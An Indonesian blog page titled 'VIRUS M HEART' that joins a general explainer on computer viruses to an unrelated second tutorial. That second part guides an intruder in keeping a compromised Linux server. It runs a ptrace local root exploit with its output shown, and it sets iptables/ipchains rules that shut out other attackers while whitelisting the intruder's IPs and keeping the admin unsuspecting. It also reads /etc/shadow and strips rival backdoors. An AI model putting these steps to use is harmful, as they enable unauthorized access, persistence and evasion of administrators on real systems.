TUTORIAL KOMPUTER
  • 10 Virus Komputer Paling Mematikan Di Dunia
  • Kunci Mempercepat Acces Komputer
  • MENGENAL SISTEM KOMPUTER
  • Sejarah Perkembangan Komputer
  • Informasi computer terkini
  • Mengenal System Software
  • Mengupas Masalah Motherboard
  • Mengupas Detail Tentang CPU
  • Kode Mempercepat Editing Paragraf
  • Memproteksi Folder Dengan Password
  • Macam-Macam Perintah Pada Run Commands
  • Mempercepat Waktu Shutdown
  • Ubah Tampilan Windows
  • Kode Akses Siemens
  • Kode Akses Samsung
  • Kode Akses Sony Ericsson
  • Kode Akses Nokia
  • Seni Photoshop ( Angan Merokok )
  • Menyembunyikan Menu Help Pada Start Menu
  • Menyembunyikan Menu Document Pada Start Menu
  • Menyembunyikan menu Find pada Start Menu
  • Mengembalikan Folder Documents Yang Hilang
  • Memproteksi File
  • Mengganti Icon Drive
  • Mengganti Alignment Pada Drop Down Menu
  • Disable Klik Kanan Pada Taskbar
  • Disable Klik Kanan Pada Dekstop & Explorer
  • Menyembunyikan Menu Start Menu
  • Persentasi Antara Flash Dan Power Point
  • Mengganti Screen Saver Lewat Registry
  • Menghilangkan Username Pada Start Menu
  • Menampilkan Administrator Di Welcome Screen
  • Menyembunyikan My Recent Documents
  • TUTORIAL HACKER
  • Bad Unicode
  • Cara Skip Win Registrasi XP
  • Craking Dengan F.A.R.A.B.I
  • DoS, Serangan yang Belum Tertangkal
  • Hack Dan Prinsip Dasar Psikologis Hack
  • Hacking NT Server Melalui Remote Data Service
  • 95% Web Server Di Dunia has been dead
  • Hacking Web Site with cart32.exe installed
  • Konsep Lain Menjebol Server Webfroot Shutbox
  • Istilah Teknologi Informasi Bahasa Indonesia
  • Mendapatkan account ISP gratis!
  • Mendapatkan Serial Number WinZip 8.1
  • Menghilangkan Password Bios
  • Mengintip Password Linux
  • Menjebol Apache Web Server Melalui Test-Cgi
  • Menjebol Server Melalui Service FTP
  • Pembobolan 1000 Kredit Card di Step-up
  • Penjebolan Server Melalui FTP
  • Hati-hati DLM Mengetikkan Klikbca.Com
  • VIRUS M HEART
  • Bongkar Password Microsoft Acces
  • BUG TELKOMSEL & (FREE Phone ke-CYPRUS
  • Cara Efisien Mendapatkan Puluhan Ribu Email
  • Cara Sederhana membuat virus PHP
  • Cara Singkat Menginfeksi Openssh-3.4p1 Z
  • Cracking GateKeeperm
  • HACKING FOR BEGINNER
  • Hack Windows NT2000XP Admin Password
  • Melewati pembatasan hak akses warnet
  • Melindungi Data dari SQL Injection
  • memainkan fungsi tombol HP
  • Membedah Teknik SQL Injection
  • Bongkar key Windows Dengan @ stake LC4
  • Meminimalkan Biaya Saat menelpon Di Wartel
  • Menangani Virus Lohan
  • MENGACAK-ACAK REGISTRY WARNET
  • Mengelabui Pengejar Hacker
  • Meng-Hack Pesawat Telepon Yang Terkunci
  • Meng-hack PHP-BUg's
  • Kelemahan pasword & login yahoo pd Cgi
  • Trik Penjebolan Sites
  • Ragam Hacking Menggunakan Google
  • Rahasia Teknik Serangan SQL Injenction
  • Teknik Pembuatan Virus Makro Pd XP
  • Seni Internet, Googlingg
  • Situs Hacker Yang Ikut Bermasalah
  • Teknik Hacking Situs KPU Dr segla arah
  • Teknik Menyusup Ke TNP Center KPU
  • Tip N Trik Telephon Gratis Musso
  • Trik Mereset Password Windows 9x
  • TUTORIAL BLOG
  • Menuliskan Script di Blog
  • Membuat Artikel Terkait/Berhubungan
  • Membuat Feed di Blog Dengan Javascript
  • Membuat Navigasi Breadcrumb di Blog
  • Membuat Meta Deskripsi di Halaman Blog
  • Membuat Readmore Versi 1
  • Membuat Read More Otomatis di Blog
  • Membuat Read More Versi 2
  • Membuat Tabs Menu Horizontal
  • Membuat Menu Tab View
  • Membuat Menu Vertikal
  • Cara Memasang Musik Pada Blog
  • Membuat Template Blog Hasil Buatan Sendiri
  • Buat Threaded Comment dgn Intense Debate
  • Membuat Menu DTree
  • Membuat Tab Menu Dengan Banyak Style
  • Menambah Toolbar Baru di Blogspot
  • Cara Membuat Tabel di Blog
  • Cara Membuat Tulisan Berjalan
  • Melakukan Backup Website atau Blog
  • Mendapatkan Free Hosting
  • Membuat Widget Status Twitter pada Blog
  • Manampilkan Profil Facebook di Website (blog)
  • Membuat Avatar Komentar Pada Blogger
  • Membuat Halaman Contact Me pada Blogspot
  • Cara Membuat Status Yahoo Messenger di Blog
  • Mendapatkan Layanan Google Friend Connect
  • Membuat Nomor Page Posting Di Blog
  • Tips dan Trik Menambah Kolom Di Blog
  • Mengatasi "Invalid Widget ID" pada Blogger
  • Membuat Slide Show Album Foto di Blog
  • Membuat Kotak Komentar dibawah Posting
  • Cara Membuat Kotak Link Exchange
  • Membuat Link Download
  • Cara Membuat Dropdown Menu
  • Cara Membuat Buku Tamu
  • Trik Memproteksi Blog
  • Cara Membuat Search Engine
  • Membuat Kategori / Label di Blogger
  • Menghilangkan Navbar (Navigation Bar)
  • Memasang Emoticon di Kotak Komentar
  • Menambah Emoticon di Shoutbox
  • Pasang Jam di Sidebar
  • Memasang Pelacak IP Address
  • Mengganti Tulisan "Older Post / Newer Post"
  • Memasang Alexa Traffic Rank
  • Memasang Tombol Google Buzz
  • Cara Membuat Cursor Animasi
  • Menyembuyikan Buku Tamu
  • 5 Cara Terbaik Mendapatkan Uang Dari Blog
  • Blogging Cepat Dengan BlogThis!
  • 21 Posts Separator Images
  • Mengganti Link Read More Dgn Gambar
  • Cara Menampilkan 10 Artikel Di Recent Posts
  • Offline Blogging Dgn Windows Live Writer
  • Cara Memasang Jadwal Sholat
  • Cara Membuat Daftar Isi Blog Otomatis
  • Membuat Daftar Isi Blog Manual
  • Iklan Google Adsense Di Tengah Artikel
  • Membuat Link Warna - Warni
  • Meletakkan Widget Di Bawah Header
  • Membuat Kotak Scrollbar
  • Memasang Video Di Artikel
  • Kode Warna HTML
  • Home » » VIRUS M HEART

    VIRUS M HEART

    Terus terang penulis merasa bosan, mungkin juga Anda karena semua buku tentang virus selalu mendefinisikan virus komputer dan Anda, juga bekas saya tidak mengerti bagaimana virus komputer itu sebenarnya. Tapi untuk menulis buku tentang virus adalah lucu jika penulis tidak mendefinisikan virus
    komputer itu.

    Sebelum penulis mendefinisikan apa itu virus komputer, penulis mempunyai sedikit cerita mengenai virus komputer. Pengalaman temanku yang pernah bekerja dibagian technical di bidang networking sekitar 5 th lalu. Ceritanya saat itu temanku sedang menginstall software untuk customer yaitu software lotus dari sebuah
    disket. Ternyata gara-gara disket tersebut, komputer tersebut terkena virus boot record, dan tentunya Anda tahu bahwa penulis diomelin oleh yang punya komputer secara babi buta. 

    Perlu Anda ketahui bahwa komputer tersebut menggunakan versi dos 6.20. Karena penulis hanya mempunyai disket instalasi Dos versi 6.22, maka penulis menginstallkan versi dos 6.22 tersebut untuk membasmi virus boot record tersebut. Setelah selesai maka virus itupun hilang. Tetapi karena versi dos yang berbeda (dari 6.20 ke 6.22) maka vsafe yang mengecak perubahan file dari dengan file ”chkdsk.ms” selalu melaporkan bahwa ukuran file telah berubah dan mungkin file tersebut telah terserang virus yang padahal perubahan itu adalah karena perubahan versi dos dari 6.20 ke dos 6.22 sehingga pemilik komputer itu masih terus mengomel-ngomel. Penulis berusaha menjelaskan tetapi dijawab bahwa ia sudah memakai komputer  puluhan tahun sedangkan penulis yang baru memakai komputer dianggap tidak tahu apa-apa selain bongkar-pasang komputer. 

    Akhirnya penulis mengalah dan penulis disuruh untuk mengganti Sim Card(memory) dan HardDisk. Padahal apa hubungannya virus tersebut dengan Sim card maupun HardDisk ?. Sedikit cerita diatas adalah suka duka penulis ketika selalu berhadapan dengan customer yang mempunyai berbagi sifat, pengetahuan dan latar belakang yang berbeda. Penulis hanya mengharapkan supaya Anda yang mengerti baik mengerti banyak maupun sedikit janganlah terlalu tinggi hati dan barbagilah ilmu tersebut dengan orang lain karena bagaimanapun juga Kita masih belum apa-apanya jika dibandingkan dengan anak-anak kecil yang maniak komputer seperti di AS maupun di Jepang.

    Virus komputer adalah program yang ditulis, biasanya dengan bahasa tingkat rendah seperti assembly yang mempunyai kemampuan untuk menyebarkan dirinya dari satu program ke program lainnya. Virus komputer tidaklah sama dengan virus penyakit, karena virus komputer tidak berwujud. Ia dinamakan sebagai Virus komputer hanya karena mempunyai kemampuan seperti virus penyakit yang mampu meyebarkan dirinya dan umumnya bersifat merugikan. Virus komputer bisa dibuat dengan mudah oleh para pakar software terutama bagi yang menguasai bahasa tingkat rendah seperti bahasa assembly dan kemampuan untuk mengerti cara kerja dari sistem operasi. Tapi saat sekarang telah banyak virus yg dibuat dengan bahasa tingkat tinggi seperti makro, dlsb

    Bagaimana Virus Menyebarkan Dirinya

    Virus hanya bisa menyebarkan diri jika diaktifkan atau jikaia dieksekusi. Jadi adalah tidak mungkin bagi virus untuk menyebarkan dirinya melalui file Ascii dan juga tidak mungkin komputer Anda terserang virus karena ada disket bervirus yang ditaruh ke dalam drive komputer Anda tanpa dieksekusi dan lebih mustahil lagi jika disket Anda maupun komputer Anda terserang virus karena adanya komputer atau disket bervirus yang berada didekatnya.

    Karena itu biasanya virus menyebarkan diri melalui file yang bisa dieksekusi seperti, .com, .exe, .bat,.Ovl.,Drv dan lain-lainnya. Untuk Menyebarkan Dirinya, virus biasanya akan menempelkan dirinya didalam file eksecutable sehingga ia akan dijalankan jika file tempat ia menumpang dijalankan.

    Yang perlu Anda ingat adalah, bahwa virus komputer bukanlah suatu yang hidup seperti virus-virus penyakit yang Kita kenal yang bisa saja menyebar melaui udara dan media perantara lainnya. Virus komputer sama saja dengan program-program biasa yang hanya bisa aktif jika dieksekusi, jadi adalah tidak mungkin jika virus bisa aktif tanpa dieksekusi sehingga biasanya virus selalu menumpang pada program yang bisa dieksekusi. Virus tidak dapat menyebar melalui file yang tidak dieksekusi, seperti file data teks dan lain sebagainya. tetapiperlu Anda ingat bahwa virus komputer bisa merusak apapun juga yang ada dikomputer kecuali hardware. Sepengetahuan penulis, belum ada virus yang mampu merusak hardware komputer seperti meledakkan monitor, merusakkan memory ,keyboard dan lain sebagainya.

    Bisakah Virus Dibuat orang Awam ?

    Untuk Membuat Virus diperlukan pengetahuan yang tidak sedikit. Anda dituntut untuk menguasai bahasa tingkat rendah yang terkenal susah untuk dipelajari dan pengetahuan tentang sistemoperasi. Dengan demikian untuk membuat virus bagi orang awam adalah sangat susah tapi sangatlah mungkin bagi orang awam untuk belajar mengetahui dan mengantisipasi virus walaupun ia tidak mengetahui cara membuat virus itu secara pasti. Untuk virus dengan bahasa tingkat tinggi, semakin memudahkan orang untuk membuat virus tanpa menguasai bhs assembly yang terkenal rumit, yang anda butuhkan hanyalah pengetahuan yang selalu dirahasiakan.


    Ini adalah pertanyaan yang selalu ada dibenak penulis ketika baru berkenalan dengan komputer dan virus komputer. Tapi saat ini rasanya penulis mendapatkan jawabannya bahwa sampai saat ini belum ada anti virus yang mampu mencegah semua virus yang beredar. Hal ini dikarenakan cara kerja virus yang berbeda-beda sehingga untuk mencegah ataupun mengobati virus, anti virus harus mengetahui terlebih dahulu cara kerja virus tersebut sehingga tidak akan ada anti virus yang bisa mencegah dan mengobati semua virus yang telah dan akan beredar.

    Mungkinkah Program Anti Virus Menjadi Penular Virus ?

    Program anti virus sebenarnya juga merupakan program biasa yang bisa terserang virus. Bila program anti virus Anda telah terserang virus, maka justru program anti virus Andalah yang akan menjadi penular virus kepada program dan komputer lainnya. Untuk itu disarankan agar Anda selalu menyimpan anti virus pada disket yang masih bersih.

    Perlu juga Anda ketahui bahwa ada juga program anti virus yang bisa memeriksa dirinya sendiri dan menyembuhkan dirinya sendiri bila terserang virus komputer. Walaupun demikian Anda tetap dianjurkan untuk tetap menyimpan juga cadangan program anti virus pada disket yang bersih dari virus karena cara ini
    lebih aman. Disket Anda juga seharusnya di proteksi, sehingga tidak dapat terjadi penulisan pada disket sehingga virus tidak dapat meyerang program anti virus Anda yang berada di disket.

    Apa Yang Biasanya Virus Lakukan ?

    Tidak ada yang mengetahui secara pasti apa yang bakal dilakukan oleh sebuah virus, karena itu sangat tergantung dari pembuatnya. Sebuah virus mungkin saja hanya akan menampilkan pesan pada waktu yang telah ditentukan ataupun hanya memperbanyak dirinya tanpa melakukan sesuatu yang nyata. Ada juga virus yang sangat berbahaya seperti virus yang dibuat secara khusus untuk merusak sistem ataupun untuk mengambil keuntungan pribadi seperti mencuri uang dan rahasia perusahaan maupun rahasia negara. Dapat dikatakan semua virus yang beredar tidak ada yang menguntungkan Kita, karena program virus yang parasit biasanya akan merusak ataupun akan mengacaukan program Kita walaupun mungkin dari pembuat virus itu sendiri tidak mengharapkan demikian.

    Apa Yang harus Saya Lakukan Jika Komputer Saya Terserang Virus ?

    Langkah yang paling pertama yang dapat Anda lakukan adalah jangan panik. Usahakanlah untuk membackup semua data Anda yang penting, tapi ingat jangan membackup program-program yang telah terserang virus. Bila Anda bisa mengetahui secara pasti jenis virus yang menyerang komputer Anda, carilah anti virus, kalau bisa carilah anti virus buatan local karena biasanya lebih bagus. Bila Anda tidak mengetahui secara pasti virus
    yang menyerang komputer Anda cobalah pakai anti virus yang ada dipasaran seperti scan, nav, dll untuk mendeteksi virus tersebut dan untung-untungan virus tersebut bisa dikenal dan dibasmi oleh anti virus tersebut. Jika Anda tidak bisa menemukan anti virusnya, maka langkah terakhir adalah memformat ulang harddisk Anda dengan disket bersistem yang bersih dari virus dan Anda terpaksa harus menginstall ulang semua aplikasi Anda.

    Bagaimana Caranya Supaya Komputer Saya Tidak Terserang Virus ?


    Penulis tidak bisa memberikan Anda resep yang bisa mencegah supaya komputer Anda terbebas dari virus 100%, karena komputer penulispun sering terkena virus komputer. Tetapi untuk mencegah atau meminimalkan supaya virus komputer tidak gampang menyerang komputer Anda, penulis bisa memberikan Anda saran :

    - Virus komputer biasanya disebarkan melalui disket yang dipakai pada beberapa komputer, karena itu hindarilah atau selalu periksa disket yang dipakai bersama.

    - Jika Anda hendak menginstall program, pastikan itu adalah disket asli yang terproteksi atau carilah instalasi yangberasal dari CD.

    Jangan biarkan sembarang orang untuk memakai komputer Anda.

    - Hindarilah mengambil sembarang program dari internet dari sumber yang tidak jelas.

    Jangan sembarang memakai game, karena biasanya game adalah media yang bagus bagi virus untuk menyebarkan dirinya.

    Pakailah program anti virus yang residen di komputer Anda untuk mendeteksi dan memonitor jika terdapat sesuatu yang mencurigakan.

    - Selalulah pakai anti virus yang terbaru, karena anti virus yang terbaru selalu mengikuti perkembangan terbaru dari virus yang beredar.

    - Perhatikanlah jika terjadi sesuatu yang janggal atau yang tidak biasa pada komputer Anda, seperti terjadi penulisan ataupun pembacaan pada harddisk yang tidak biasanya. Anda juga harus memperhatikan jika tiba-tiba komputer Anda menjadi lebih lambat ketika menjalankan suatu aplikasi, karena hal ini biasanya diakibatkan oleh program virus yang ikut dijalankan.

    Jika bisa, perhatikan ukuran dari file eksecutable Anda. Jika ukuran file eksekutable Anda bertambah maka hampir dapat dipastikan jika komputer Anda telah terserang virus komputer.

    5 Langkah Mengamankan Shell Anda menggunakan ipchains/iptables

    Kehilangan sesorang yang selama ini dianggap tak ada, membuat saya berpikir/merenung, penyesalan ternyata selalu ada di belakang. Dan juga kebosanan di layar hitam membuat saya menulis tutorial ini. Disaat anda asik menjelajah dalam shell/server orang tiba-tiba anda di paksa keluar oleh orang yang tidak anda ketahui.. kesel kan, nah supaya hal ini tidak terjadi pada anda tutor berikut akan sangat berguna, Target Saat ini target yang paling banyak Vulnerable nya masih di dominasi oleh server-server Apache+openssl, disusul oleh Samba. Hal ini disebabkan karena sampai bulan Maret 2003 saja Server yang menggunakan Apache ada sekitar 24.486.857 buah atau sekitar 62% Bahan Shell untuk mencari target

    Target, bisa dengan mass scanning bisa juga mencari satu persatu, ini masalah Anda In The Target
    Setelah mendapatkan target apa yang Anda lakukan? Apa cukup download psybnc atau Eggdrop dan menjalankannya, yang cuman bertahan 5 menit :p atau paling lama sehari. Mau punya eggdrop atau psybnc yang awet kan ? Ikuti langkah-langkah berikut.... 

    Langkah pertama 
    kenali system anda (target) memakai system apa, distro apa, menjalankan apa saja... caranya? masak nggak
    tahu... bagi yang belum ngerti 
    bash-2.05a$cat /etc/issue
    Red Hat Linux release 7.0 (Guinness)
    Kernel 2.2.16-22smp on an i686

    Dari sini kita tahu bahwa system kita memakai Distro RedHat versi 7.0, sekarang kita coba local exploit, krn sbg user kita nggak bisa mengamankan system kita, saran saya pake exploit ptrace Setelah download exploit nya kita gcc dan jalankan... bash2-0.5a$./ptrace
    [+] Attached to 16097
    [+] Waiting for signal
    [+] Signal caught
    [+] Shellcode placed at 0x4000fd1d
    [+] Now wait for suid shell...
    sh-2.05a# id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

    pengalaman saya kadang menemui beberapa server yang sepertinya tidak bisa diexploit menggunakan exploit ini, jangan putus asa, coba jalankan sekali lagi, sekali lagi dan sekali lagi sampai berhasil :p dan lebih sering tanda sh-2.05a# tidak akan muncul jika anda mengexploit memakai openssl, jadi rajin-rajinlah mengetahu jati diri dengan mengetikkan id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

    Langkah kedua,
    ketahui interface ethernet card system anda, karena ini akan kita gunakan untuk membuat rule ipchains/iptables nantinya sh-2.05a#/sbin/ifconfig
    eth0 Link encap:Ethernet HWaddr 00:E0:4C:01:29:42
    inet addr:203.253.11.xx Bcast:202.155.108.255 Mask:255.255.255.0

    eth1 Link encap:Ethernet HWaddr 00:60:67:79:4B:E9
    inet addr:192.168.68.82 Bcast:192.168.83.255 Mask:255.255.255.0

    lo Link encap:Local Loopback
    inet addr:127.0.0.1 Mask:255.0.0.0

    sebagian di potong untuk menghemat tempat, dan dalam hal ini itu nggak begitu penting, yang terpenting adalah mengetahui interface nya dalam hal ini eth0 dan eth1, lo udah pasti ada, inet addr juga perlu di catat beserta Mask (netMask nya) 

    Langkah ketiga
    Kita periksa apakah ipchains atau iptables sudah melaksanakan aksinya...
    sh-2.05a#/sbin/ipchains -L
    ipchains: Incompatible with this kernel

    cuekin saja... kemungkinan module iptables lah yang dipake
    sh-2.05a#/sbin/iptables -L
    Chain INPUT (policy ACCEPT)
    Chain FORWARD (policy ACCEPT)
    Chain OUTPUT (policy ACCEPT)

    asikkk krn belum ada rule sama sekali, kerjaan akan semakin gampang, kalau sudah ada rule akan sedikit ruwet, gunakan otakmu yah. hasil dari ipchains -L juga telihat sama kok (bagi system yang menggunakan ipchains, kalau kita ketik /sbin/iptables -L maka akan muncul pesan error untuk mengupgrade kernel) bla....bla... Perhaps iptables or your kernel needs to be upgraded.

    Langkah keempat
    Tugas kita selanjutnya adalah membuat rule ipchains atau iptables (tergantun dari hasil langkah ke tiga) untuk memblock port https (443) agar intruder2 lainnya nggak bisa masuk ke target kita lagi. Yang perlu di ingat adalah shell/server ataupun IP yang kita pergunakan untuk mengexploit target harus tetap bisa masuk ke target ini, artinya selain IP kita dan ip target (untuk menghindari kecurigaan admin, kok nggak bisa di access httpsnya) nggak bisa masuk ke port 443. Misalnya ipyang biasa kita gunakan mencari target adalah 202.68.19.82 dan 202.12.1.19.76 maka rule nya adalah
    Rule ipchains nya:
    sh-2.05a#/sbin/ipchains -A input -s 203.253.11.xx -j ACCEPT
    sh-2.05a#/sbin/ipchains -A input -s 192.168.68.82/24 -j ACCEPT
    sh-2.05a#/sbin/ipchains -A input -s 202.68.19.82 -j ACCEPT
    sh-2.05a#/sbin/ipchains -A input -s 202.12.1.19.76 -j ACCEPT
    sh-2.05a#/sbin/ipchains -A input -i lo -j ACCEPT
    sh-2.05a#/sbin/ipchains -A input -d 203.253.11.xx 443 -p tcp -j REJECT

    Rule iptables nya :
    sh-2.05a#/sbin/ipchains -A INPUT -s 203.253.11.xx -j ACCEPT
    sh-2.05a#/sbin/ipchains -A INPUT -s 192.168.68.82/24 -j ACCEPT
    sh-2.05a#/sbin/ipchains -A INPUT -s 202.68.19.82 -j ACCEPT
    sh-2.05a#/sbin/ipchains -A INPUT -s 202.12.1.19.76 -j ACCEPT
    sh-2.05a#/sbin/ipchains -A INPUT -i lo -j ACCEPT
    sh-2.05a#/sbin/ipchains -A INPUT -d 203.253.11.xx -p tcp --dport 443 -j REJECT

    Keterangan :
    selengkapnya bisa baca-baca di http://www.linuxguruz.org/iptables/ atau tanya paman Google baris pertama segala yang masuk berasal dari IP 203.253.11.xx di terima baris kedua sampai keempat sama seperti baris pertama cuman source nya saja yang berbeda yang kedua agar ip local networknya masih tetap bisa mengaccess port https target kita, ini untuk mengurangi kecurigaan adminnya, baris ketiga dan keempat adalah IP kita agar sewaktu-waktu kalau user kita dihapus oleh root kita bisa masuk lagi ke sana lewat port
    https baris kelima untuk loopback buat jaga-jaga juga biar admin nggak curiga nah baris terakhir berarti semua yang masuk ke IP 203.253.11.xx protokol tcp port 443 akan di REJECT atau di tolak

    Kalau kamu mau nambahin agar access ssh nya di filter juga tinggal tambahin satu baris dan ganti angka 443 (hhtps) dengan angka 22 (ssh)Untuk samba? tinggal tambahkan port samba agar di filter.
    Selanjutnya:
    sh-2.05a#/sbin/service ipchains save //menyimpan file configurasi ipchains biasanya akan terbentuk
    file /etc/sysconfig/ipchains
    atau
    sh-2.05a#/sbin/service iptables save //untuk iptables

    sh-2.05a#chattr +suia /etc/sysconfig/ipchains //change attribut file configurasi
    ketik "man chattr" untuk mengetahui arti/fungsi lengkapnya,
    untuk iptables tinggal rubah ipchains menjadi iptables :
    sh-2.05a#chattr +suia /etc/sysconfig/iptables

    Sampai di sini Anda bisa sedikit menarik nafas, karena sudah berhasil mengamankan system dari intruder lainnya.Tugas selanjutnya adalah memeriksa apakah system anda masih sehat atau jangan-jangan sebelum anda mendarat di sini sudah ada intruder lainnya yang sudah menginjakkan kaki :) Kalau saya biasanya memeriksa file /etc/passwd dan file /etc/shadow sh-2.05a#cat /etc/passwdroot:x:0:0:root:/root:/bin/bash
    .....deleted.....
    vadmin:x:0:0:virtual admin:/sbin:/sbin/nologin
    project:x:501:501:project:/home/project:/bin/bash
    nari:x:502:502:nari:/home/nari:/bin/bash
    cd:x:503:503::/sbin/cd:/bin/bash

    dari sini kita mesti curiga si user cd kok aneh sendiri home nya nya di /sbin/cd truss comment nya juga kosong beda dengan yang dua di atas nya, yang kedua user vadmin, kalian sudah pasti curiga kalau sudah begini, apa yang akan dilakukan dengan yang satu ini? itu terserah anda, mau di hapus juga bisa, di biarkan juga nggak apa-apa.... saran saya access ssh di protek/REJECT biar dia nggak bisa masuk lagi, cara lainnya ganti shell nya dari
    /bin/bash
    menjadi
    /dev/null
    caranya: pastikan /dev/null sudah masuk ke dalam daftar shells
    di /etc/shells , jika belum
    sh-2.05a#echo "/dev/null" >> /etc/shells
    sh-2.05a#chsh -s /dev/null cd
    Changing shell for cd.
    Shell changed.

    Berikutnya adalah memeriksa file /etc/shadow sh-2.05a#cat /etc/shadow root:$1$6AMBRqgR$enOJoSLX7NXf6kuZMfbRq/:12150:0:99999:7:::
    bin:*:12150:0:99999:7:::
    .....deleted......
    vadmin::12150:0:99999:7:::
    nari::12150:0:99999:7:::134523415

    sama seperti di atas kita mestinya mencurigai keduanya, krn seorang administrator tidak akan membiarkan usernya melakukan ini, ini sudah pasti kerjaan intruder.... Done!... 

    Langkah kelima
    Memeriksa apakah system kita sudah dipasangi backdoor... ini adalah tahap yang paling sulit bagi pendatang baru, dan bisa mengakibatkan rusaknya system :p Jika Anda suka tantangan ikuti terus dan jika tak punya nyali cukup sampai di sini.

    Dulu saya kesulitan bagaimana cara menemukan sesorang telah memasang backdoor di dalam system/target, karena tidak bisadengan netstat, ps -aux atau lainnya. Karena file-file ini sudah tergantikan oleh file yang sudah di modifikasi. Untuk memastikannya lakukan langkah berikut:
    sh-2.05a#cat /etc/rc.d/rc.sysinit
    ......deleted......
    wait
    # Xntps (NTPv3 daemon) startup..
    /usr/sbin/xntps -q

    kalau kalian menemukan seperti ini saya pastikan bahwa system ini sudah terpasangi backdoor t0rnkit (untuk backdoor lainnya hampir sama, yang berbeda cuman nama file yang di load), untuk menghapusnya tidak cukup dengan menghapus file /usr/sbin/xntps saja, krn proses/service nya masih jalan, yang mana kalau kita ps aux tidak terlihat sama sekali, trus bagaimana cara mengetahuinya...Gampang! Hapus file ps, netstat dll atau hapus paket ps, netstat dll caranya :
    sh-2.05a#whereis ps
    ps: /bin/ps

    sh-2.05a#rpm -qf /bin/ps
    procps-2.0.7-3

    sh-2.05a#whereis netstat
    netstat: /bin/netstat

    sh-2.05a#rpm -qf /bin/netstat
    net-tools-1.56-2

    di dalam contoh ini ada dua paket rpm yang harus kita re-install, langkah pertama tentu saja mendownload paket itu sesuai dengan distro target kita (dalam contoh target menggunakan Distro RedHat 7.0), kita cari paket tersebut di www.rpmfind.net dengan kata kunci procps dan net-tools
    sh-2.05a#cd /usr/local/src //masuk ke directory /usr/local/src

    sh-2.05a#wget ftp://ftp.rpmfind.net/linux/redhat/7.0/en/os/i386/RedHat/RPMS/net-tools-1.56-2.i386.rpm

    ftp://ftp.rpmfind.net/linux/redhat/7.0/en/os/i386/RedHat/RPMS/procps-2.0.7-3.i386.rpm //download paket procps dan net-tools

    PENTING!!!
    sh-2.05a#chattr -suia /usr/bin/top /bin/ps //rubah attribut file ps dan top

    sh-2.05a#rpm --erase --nodeps procps-2.0.7-3 //hapus paket procps walaupun ada depedencies

    kalau muncul ini Anda tidak memperhatikan saya :p
    removal of /usr/bin/top failed: Operation not permitted
    removal of /bin/ps failed: Operation not permitted

    sh-2.05a#rpm -ivh procps-2.0.7-3.src.rpm //install paket procps yang baru di download
    procps ##################################################

    sh-2.05a#ps -awx //Lihat process backdoor
    ......deleted......
    2457 ? Z 0:00 /usr/sbin/xntps -q

    sh-2.05a#kill -9 2457 //kill proses backdoor

    sh-2.05a#chattr -suia /usr/sbin/xntps //rubah attribut file backdoor

    sh-2.05a#rm -f /usr/sbin/xntps //hapus file backdoor

    Untuk netsat dan lain-lainnya
    PENTING!!!
    sh-2.05a#chattr -suia /sbin/ifconfig /bin/netstat

    sh-2.05a#rpm --erase --nodeps net-tools-1.56-2

    kalau muncul ini Anda cuek bebek ;p
    removal of /sbin/ifconfig failed: Operation not permitted
    removal of /bin/netstat failed: Operation not permitted

    sh-2.05a#rpm -ivh net-tools-1.56-2.src.rpm
    net-tools ##################################################

    Cara lainya yang lebih sederhana adalah menggunakan socklist, tapi pada system tertentu paket/file
    ini tidak terinstal, socklist terdapat pada paket procinfo-xx-x (xx adalah versinya), dengan socklist kita bisa mengetahui socket/port berapasaja yang LISTENING dan siapa saja yang menjalankan port tersebut beserta nomor proses nya (PID).

    Mengapa saya menyarankan memakai socklist ketimbang netstat, alasannya cuman satu yaitu:
    Hampir semua backdoor tidak memodifikasi file socklist.
    Done!...
    Sekian tutorial saya, atas kesediannya membaca saya ucapkan terima kasih.
    Jika Anda menyukai Artikel di blog ini, Silahkan klik disini untuk berlangganan gratis via email, dengan begitu Anda akan mendapat kiriman artikel setiap ada artikel yang terbit di Creating Website

    0 komentar:

    Posting Komentar

     
    Support : Creating Website | Tutorq Template | Template
    Copyright © 2011. FAROUQ'S - All Rights Reserved
    Template Modify by Creating Website
    Proudly powered by Blogger